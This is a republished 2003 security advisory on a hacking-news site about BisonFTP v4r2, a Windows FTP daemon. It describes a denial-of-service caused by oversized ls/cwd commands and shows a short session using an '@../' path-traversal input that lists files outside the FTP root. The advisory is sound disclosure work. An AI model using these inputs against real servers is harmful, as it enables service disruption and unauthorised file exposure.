Users login

Create an account »


Users login

Home » Hacking News » Mulitple vulnerabilities found in BisonFTP

Mulitple vulnerabilities found in BisonFTP

by Nikola Strahija on February 18th, 2003 There are several vulnerabilities found in BisonFTP.

BisonFTP is a FTP daemon used on Microsoft Windows 9x/NT systems.

-[ DESCRIPTION ]----------------------------------------------------------------
I) BisonFTP is vulnerable to a DoS attack by sending ftp commands with big
data. By sending the ftp command ls or cwd with 4300 bytes or more,
BisonFTP will start 100% CPU usage until the socket is closed by the client.

II) It's possible to trick BisonFTP into revealing confidiential information
about files outside ftp root.

ftp> ls @../
227 Entering PASV Mode (10,10,10,10,4,126)
150 Directory List Follows
-rwxrwxrwx 1 user group 739577 Feb 05 2002 BisonFTP42.exe
226 Listing complete.
ftp> mget @../Biso
local: BisonFTP42.exe remote: BisonFTP42.exe
227 Entering PASV Mode (10,10,10,10,4,128)
550 File does not exist

% Note that BisonFTP42.exe is NOT located in ftp root.

-[ AFFECTED VERSIONS ]----------------------------------------------------------
BisonFTP v4r2.
* Earlier versions are not tested.

-[ SOLUTION/WORKAROUND ]--------------------------------------------------------
It's not possible to get in contact with the people at
anymore. I guess a new version will never be released.

Workaround, since there might not be a new version you probaly better to
install another FTP daemon.

-[ CREDIT ]---------------------------------------------------------------------
Bugs found: 15/jan 2003, by Jimmi Andersen
Vendor contacted: 11/feb 2003
Made public: 17/feb 2003 | Immune - Angreb og forsvar af systemer

Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.


Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »